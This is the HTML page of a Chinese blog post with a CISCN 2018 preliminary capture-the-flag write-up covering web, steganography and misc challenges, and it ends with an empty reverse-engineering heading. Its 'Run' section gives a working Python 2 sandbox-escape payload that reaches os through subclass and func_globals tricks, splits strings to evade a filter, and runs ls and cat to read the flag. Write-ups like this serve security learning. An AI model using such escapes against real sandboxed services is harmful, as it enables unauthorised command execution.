<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.8.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="Another independent blog written by a CTFer."><title>CISCN 2018 初赛 Write-up | Aspen Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create','UA-42440632-2','auto');ga('send','pageview');
</script></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">CISCN 2018 初赛 Write-up</h1><a id="logo" href="/.">Aspen Blog</a><p class="description">Memories &amp; Technologies</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">CISCN 2018 初赛 Write-up</h1><div class="post-meta">May 27, 2018<span> | </span><span class="category"><a href="/categories/writeup/">writeup</a></span><span class="post-time"><span class="post-meta-item-text"> | </span><span class="post-meta-item-icon"><i class="fa fa-keyboard-o"></i><span class="post-count"> 482</span><span class="post-meta-item-text"> 字</span></span></span><span class="post-time"> | <span class="post-meta-item-icon"><i class="fa fa-hourglass-half"></i><span class="post-count"> 2</span><span class="post-meta-item-text"> 分钟</span></span></span></div><a class="disqus-comment-count" data-disqus-identifier="2018/05/27/ciscn-prelim-wp/" href="/2018/05/27/ciscn-prelim-wp/#disqus_thread"></a><div class="post-content"><p>多年不更新，趁有时间整理一下最近比赛的writeup.</p>
<p>虽然是饱受诟病的国赛和永远做不了的选择题，虽然题目有点乱，但是。。。毕竟是国赛嘛，还是得认真打</p>
<p><a href="https://www.zhihu.com/question/275155066" target="_blank" rel="noopener">知乎传送门</a>  结合知乎食用 风味更佳</p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Easyweb"><a href="#Easyweb" class="headerlink" title="Easyweb"></a>Easyweb</h3><p>。。。找了半天的注入点发现是空密码我会告诉你？</p>
<h3 id="Picture"><a href="#Picture" class="headerlink" title="Picture"></a>Picture</h3><p>下载到的 PNG（实际是 JPG）尾部添加了 zlib 数据。</p>
<p>binwalk –e 提取之，发现是 base64 编码；解码之，获得一个文件头是“4B 50”的文件。</p>
<p>修改为“50 4B”，发现是压缩包，提示密码是“ZeroDivisionError: …………”<br>用 python 被零除的默认错误信息实验（integer division or modulo by zero）（感谢某lth大佬提供脑洞），成功解压</p>
<p>解压出的文件是 uuencoded，uudecode 之，获得 flag</p>
<h3 id="Flag-in-your-head"><a href="#Flag-in-your-head" class="headerlink" title="Flag_in_your_head"></a>Flag_in_your_head</h3><p>Js 实际是 MD5 实现，但 binl 中添加了一个 ck 函数 </p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">ck</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        ic</span><br><span class="line">    &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> a = [<span class="number">118</span>, <span class="number">104</span>, <span class="number">102</span>, <span class="number">120</span>, <span class="number">117</span>, <span class="number">108</span>, <span class="number">119</span>, <span class="number">124</span>, <span class="number">48</span>,<span class="number">123</span>,<span class="number">01</span>,<span class="number">121</span>];</span><br><span class="line">    <span class="keyword">if</span> (s.length == a.length) &#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; s.length; i++) &#123;</span><br><span class="line">            <span class="keyword">if</span> (a[i] - s.charCodeAt(i) != <span class="number">3</span>)</span><br><span class="line">                <span class="keyword">return</span> ic = <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> ic = <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> ic = <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>显而易见，将 A 的各元素 ASCII-3，获得 Token：<em>security-xbv</em>。传入，获得 flag.</p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="Run"><a href="#Run" class="headerlink" title="Run"></a>Run</h3><p>比较典型的 Python 沙盒逃逸。<br>首先先用 object 基类的<strong>subclasses</strong>子类内的 file 子类，可以构成文件读取：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">40</span>](<span class="string">'/home/ctf/sandbox.py'</span>)</span><br></pre></td></tr></table></figure>
<p>虽然不能直接 getshell，注意到退出时的错误信息 leak 出文件名，可以读取到源码。</p>
<p>此时的直接想法是利用 warnings.catch_warnings 类 linecache 引入的 os 模块，执行系统命<br>令；但是 func_globals 被 ls 规则过滤，故使用如下 payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>p = ‘func_global’ + ‘s’</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>o = [].__class__.__base__.__subclasses__()[<span class="number">59</span>].__init__.__func__.__getattribute__(p)[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>].__dict__.values()[<span class="number">144</span>]</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>c = ‘l’ + ‘s /home/ctf/’</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>o(c)</span><br><span class="line"><span class="number">5</span>c72a1d444cf3121a5d25f2db4147ebb</span><br><span class="line">bin</span><br><span class="line">cpython.py</span><br><span class="line">cpython.pyc</span><br><span class="line">sandbox.py</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>c = <span class="string">'ca'</span> + <span class="string">'t /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb'</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>o(c)</span><br><span class="line">ciscn&#123;<span class="number">62</span>a20588ef9766b418537c763366ea0c&#125;</span><br></pre></td></tr></table></figure>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><p>### </p>
</div><div class="tags"><a href="/tags/ciscn/">ciscn</a></div><div class="post-nav"><a class="pre" href="/2018/05/27/suctf-writeup/">SUCTF 2018 Write-up</a><a class="next" href="/2018/01/25/an-introduction-to-cs/">计算机科学知识体系系列 - 导论</a></div><div class="post-ad"><script src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" async></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8173953423049587" data-ad-slot="3190220378" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script></div><div id="disqus_thread"><div class="btn_click_load"><button class="disqus_click_btn">阅读评论（请确保 Disqus 可以正常加载）</button></div><script type="text/javascript">var disqus_config = function () {
    this.page.url = 'https://lpnal.me/2018/05/27/ciscn-prelim-wp/';
    this.page.identifier = '2018/05/27/ciscn-prelim-wp/';
    this.page.title = 'CISCN 2018 初赛 Write-up';
  };</script><script type="text/javascript" id="disqus-lazy-load-script">$.ajax({
url: 'https://disqus.com/next/config.json',
timeout: 2500,
type: 'GET',
success: function(){
  var d = document;
  var s = d.createElement('script');
  s.src = '//blog-lpnal.disqus.com/embed.js';
  s.setAttribute('data-timestamp', + new Date());
  (d.head || d.body).appendChild(s);
  $('.disqus_click_btn').css('display', 'none');
},
error: function() {
  $('.disqus_click_btn').css('display', 'block');
}
});</script><script type="text/javascript" id="disqus-click-load">$('.btn_click_load').click(() => {  //click to load comments
    (() => { // DON'T EDIT BELOW THIS LINE
        var d = document;
        var s = d.createElement('script');
        s.src = '//blog-lpnal.disqus.com/embed.js';
        s.setAttribute('data-timestamp', + new Date());
        (d.head || d.body).appendChild(s);
    })();
    $('.disqus_click_btn').css('display','none');
});</script><script type="text/javascript" id="disqus-count-script">$(function() {
     var xhr = new XMLHttpRequest();
     xhr.open('GET', '//disqus.com/next/config.json', true);
     xhr.timeout = 2500;
     xhr.onreadystatechange = function () {
       if (xhr.readyState === 4 && xhr.status === 200) {
         $('.post-meta .post-comments-count').show();
         var s = document.createElement('script');
         s.id = 'dsq-count-scr';
         s.src = 'https://blog-lpnal.disqus.com/count.js';
         s.async = true;
         (document.head || document.body).appendChild(s);
       }
     };
     xhr.ontimeout = function () { xhr.abort(); };
     xhr.send(null);
   });
</script></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="https://lpnal.me"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/blog/">blog</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/cs/">cs</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/git/">git</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux/">linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/python/">python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/writeup/">writeup</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/eail/" style="font-size: 15px;">eail</a> <a href="/tags/ciscn/" style="font-size: 15px;">ciscn</a> <a href="/tags/gctf/" style="font-size: 15px;">gctf</a> <a href="/tags/timezone/" style="font-size: 15px;">timezone</a> <a href="/tags/virtualenv/" style="font-size: 15px;">virtualenv</a> <a href="/tags/vscode/" style="font-size: 15px;">vscode</a> <a href="/tags/git/" style="font-size: 15px;">git</a> <a href="/tags/travis/" style="font-size: 15px;">travis</a> <a href="/tags/csrg/" style="font-size: 15px;">csrg</a> <a href="/tags/hexo/" style="font-size: 15px;">hexo</a> <a href="/tags/jekyll/" style="font-size: 15px;">jekyll</a> <a href="/tags/suctf/" style="font-size: 15px;">suctf</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/04/24/ciscn-2019-writeup/">2019 ciscn writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/02/noip-2017-puji/">某测试程序阅读题详解</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/23/git-submodule/">Git 子模块</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/14/porting-to-hexo/">从 GitHub Pages 迁移到 Hexo：Hexo + Travis CI + VPS + GPages，双镜像站点侧记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/13/venvwrapper-and-vscode/">virtualenvwrapper 配合 Visual Studio Code 使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/12/linux-timezone-setting/">调整 Linux 时区设置</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/27/suctf-writeup/">SUCTF 2018 Write-up</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/27/ciscn-prelim-wp/">CISCN 2018 初赛 Write-up</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/25/an-introduction-to-cs/">计算机科学知识体系系列 - 导论</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/12/gctf-2017-write-up/">GCTF 2017 Write-up</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-comment-o"> 最近评论</i></div><script type="text/javascript" src="//blog-lpnal.disqus.com/recent_comments_widget.js?num_items=5&amp;hide_avatars=1&amp;avatar_size=32&amp;excerpt_length=20&amp;hide_mods=1"></script></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://ctf.lpnal.top/" title="ForestCTF" target="_blank">ForestCTF</a></div><div class="widget"><script src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" async="async"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8173953423049587" data-ad-slot="4758934440" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2019 <a href="/." rel="nofollow">Aspen Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a><br><a rel="nofollow" target="_blank" href="http://www.miitbeian.gov.cn">苏ICP备17036487号-1</a> |
 <img class="nofancybox" src="/img/beian.png" style="margin-bottom: -4px;"><a rel="nofollow" target="_blank" href="http://www.beian.gov.cn">苏公网安备 32011302320688号</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div></body></html>